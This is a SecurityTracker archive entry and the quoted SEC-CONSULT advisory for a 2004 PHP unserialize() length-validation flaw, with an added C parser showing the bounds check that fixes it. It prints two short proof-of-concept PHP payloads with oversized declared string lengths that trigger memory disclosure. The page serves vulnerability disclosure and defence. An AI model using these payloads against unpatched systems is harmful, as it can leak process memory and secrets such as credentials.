SecurityTracker.com
SecurityTracker Archives
Category:  Application (Generic)  >  PHP
Vendors:  PHP Group
PHP serialize() May Let Users Execute Arbitrary Code or View Memory Contents
SecurityTracker Alert ID:  1012568
SecurityTracker URL:  http://securitytracker.com/id?1012568
CVE Reference:  GENERIC-MAP-NOMATCH
Updated:  Dec 16 2004
Original Entry Date:  Dec 16 2004
Impact:  Disclosure of system information, Disclosure of user information, Execution of arbitrary code via local system, Execution of arbitrary code via network, User access via local system, User access via network
Fix Available:  Yes   Exploit Included:  Yes   Vendor Confirmed:  Yes  
Version(s): prior to 4.3.10 and 5.0.3; tested on 4.3.9
Description:  A vulnerability was reported in PHP's unserialize() function. A script that passes a crafted serialized string to unserialize() may be able to read portions of process memory or execute arbitrary code.

Martin Eiszner of SEC-CONSULT reported that unserialize() does not validate the length field of a serialized string (the <len> in s:<len>:"...";) against the data actually present in the input. A string that declares a length far larger than the bytes supplied causes unserialize() to read past the end of the input, so a specially crafted serialized string may be able to expose portions of PHP memory or, depending on the platform, execute arbitrary code on the target system.

A demonstration exploit script is provided (the declared length 9999999 far exceeds the single byte of data; on an unpatched build the resulting value is filled from memory beyond the input, which print then discloses):

<?php
$s = 's:9999999:"A";"';   // declared length 9999999, actual data: 1 byte
$a = unserialize($s);
print $a;
?>

The crafted string only needs to reach unserialize(), so any PHP application that deserializes data a remote user controls (for example, a serialized cookie value) can be exploited remotely, depending on how the application uses unserialize().
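The check that the fix comes down to, shown as an added example written for this page in C rather than taken from PHP's source: a bounds-checked parser for the s:<len>:"...";  form that both advisory payloads abuse. The names php_unserialize_str, declared_len_fits and struct php_str are this example's own, the sample payloads are constructed from the advisory, and describing the fix as "the declared length must fit inside the remaining input" is a simplification of PHP's unserializer change, not a quotation of it.

```c
/* Added example, not PHP's code: parse the s:<len>:"<bytes>"; form of
 * PHP's serialization format with the bounds check the advisory's
 * payloads lack. */
#include <assert.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

enum php_status { PHP_OK = 0, PHP_ERR_SYNTAX, PHP_ERR_LENGTH };

/* A view into the input buffer; no copy is made, and no NUL is assumed,
 * since serialized strings may contain embedded NUL bytes. */
struct php_str { const char *data; size_t len; };

/* Parse an unsigned decimal <len> terminated by ':'. Rejects an empty
 * digit run, a missing ':', and values that would overflow size_t. */
static int parse_len(const char *p, size_t remaining, size_t *len, size_t *used)
{
    size_t v = 0, i = 0;
    for (; i < remaining && p[i] >= '0' && p[i] <= '9'; i++) {
        if (v > (SIZE_MAX - 9) / 10) return 0;      /* v*10+9 would overflow */
        v = v * 10 + (size_t)(p[i] - '0');
    }
    if (i == 0 || i >= remaining || p[i] != ':') return 0;
    *len = v;
    *used = i + 1;
    return 1;
}

/* The essential check (a simplification of the 4.3.10/5.0.3 fix): the
 * declared length, plus the closing '"' and ';', must fit in what is
 * actually left of the input. Before the fix the declared length was
 * trusted, and that many bytes were copied out of the buffer, which is
 * the memory dump the advisory demonstrates. */
int declared_len_fits(size_t declared, size_t remaining)
{
    return remaining >= 2 && declared <= remaining - 2;
}

/* Parse s:<len>:"<bytes>"; from buf[0..buflen). On PHP_OK, *out points
 * at the <bytes> inside buf. */
enum php_status php_unserialize_str(const char *buf, size_t buflen, struct php_str *out)
{
    const char *p = buf;
    size_t rem = buflen, len, used;

    if (rem < 2 || p[0] != 's' || p[1] != ':') return PHP_ERR_SYNTAX;
    p += 2; rem -= 2;
    if (!parse_len(p, rem, &len, &used)) return PHP_ERR_SYNTAX;
    p += used; rem -= used;
    if (rem < 1 || p[0] != '"') return PHP_ERR_SYNTAX;
    p += 1; rem -= 1;
    if (!declared_len_fits(len, rem)) return PHP_ERR_LENGTH;   /* the fix */
    if (p[len] != '"' || p[len + 1] != ';') return PHP_ERR_SYNTAX;
    out->data = p;
    out->len = len;
    return PHP_OK;
}

int main(void)
{
    /* Constructed inputs: the two payloads from the advisory and one
     * well-formed string for comparison. */
    const char *payloads[] = { "s:9999999:\"A\";\"", "s:30000:\"crap\";", "s:4:\"crap\";" };
    for (size_t i = 0; i < sizeof payloads / sizeof payloads[0]; i++) {
        struct php_str s;
        enum php_status st = php_unserialize_str(payloads[i], strlen(payloads[i]), &s);
        printf("%-18s -> %s\n", payloads[i],
               st == PHP_OK ? "ok" :
               st == PHP_ERR_LENGTH ? "rejected: declared length exceeds input" :
                                      "rejected: syntax");
    }
    return 0;
}
```

The parser takes an explicit buflen rather than relying on a terminating NUL, because the format's own length field is exactly the thing that cannot be trusted; the only safe bound is the size of the input the caller actually received.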

The vendor was notified on November 19, 2004.

Impact:  A script may be able to execute arbitrary code or obtain portions of memory.
Solution:  The vendor has released fixed versions (4.3.10 and 5.0.3), available at:

http://www.php.net/downloads.php

[Editor's note: Stefan Esser reports that these bugs were corrected in CVS several months ago.]

Vendor URL:  www.php.net/
Cause:  Boundary error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  Martin Eiszner <martin@websec.org>
Message History:   This archive entry has one or more follow-up message(s) listed below.
Jan 14 2005 (Conectiva Issues Fix) PHP serialize() May Let Users Execute Arbitrary Code or View Memory Contents   (Conectiva Updates <secure@conectiva.com.br>)
Conectiva has released a fix.



 Source Message Contents

Date:  Wed, 15 Dec 2004 22:32:54 +0100
From:  Martin Eiszner <martin@websec.org>
Subject:  php unserialize

 


==============================================================
SEC-CONSULT Security Advisory PHP - 4.3.9 unserialize function
======================OOOOOOOOOOOO============================

Product:        PHP 4.3.9 (Win32/Unix)
Remarks:        no other Versions tested but very likely vulnerable

Vulnerabilities:

- Data Segment memory corruption
- Information disclosure / Memory dumping

Vendor:         PHP (http://www.php.net/)
Vendor-Status:  vendor contacted (19.11.2004)
Vendor-Patches: vendor has released bugfixed versions

Object: ---

Exploitable:
Local:          ---
Remote:         PARTIAL (OS-dependent)

============
Introduction
============

Visit "http://www.php.net" for additional information.


=====================
Vulnerability Details
=====================


1) Memory Corruption / buffer overflow
======================================

FUNCTION:
unserialize (http://at.php.net/manual/en/function.unserialize.php)

DESCRIPTION:
Insufficient input validation of serialized strings leads to memory corruption and information disclosure.

EXAMPLE script - "Segfault":

---cut here---
<?php
$s = 's:9999999:"A";"';   // declared length far exceeds the data supplied
$a = unserialize($s);
print $a;
?>
---cut here---

REMARKS:
leads to arbitrary code execution and file/information disclosure.

EXAMPLE script - "Memory Dump":

---cut here---
<?php
// session- and stuff
$secret_username = "uaaaa";
$secret_password = "hoschi";
// stuff
// $c = $_COOKIE['crypted_stuff']
// $c = some cookie
/* simplified --> userinput */
$c = 's:30000:"crap";';   // declared length 30000, only 4 bytes supplied
$userdata = unserialize($c);
//
// check $userdata stuff
// for some reason output $userdata
print $userdata . "\n is NOT valid !!\n";
// stuff
?>
---cut here---

REMARKS:
Could theoretically be used to circumvent safe-mode and/or gain sensitive information about script- and memory areas.

===============
GENERAL REMARKS
===============

We would like to apologize in advance for potential nonconformities and/or known issues.

=====================================================================================================
FOR SOME STRANGE REASONS HARDENED-PHP.NET HAS RELEASED THIS ADVISORY TODAY TOGETHER WITH A BUNCH OF OTHER VULNERABILITIES
=====================================================================================================

====================
Recommended Hotfixes
====================

Vendor-Patches: vendor has released bugfixed versions

=======
Contact
=======

SEC-CONSULT Austria / EUROPE
m.eiszner@sec-consult.com

EOF Martin Eiszner / @2004
m.eiszner@sec-consult.com



Copyright 2004, SecurityGlobal.net LLC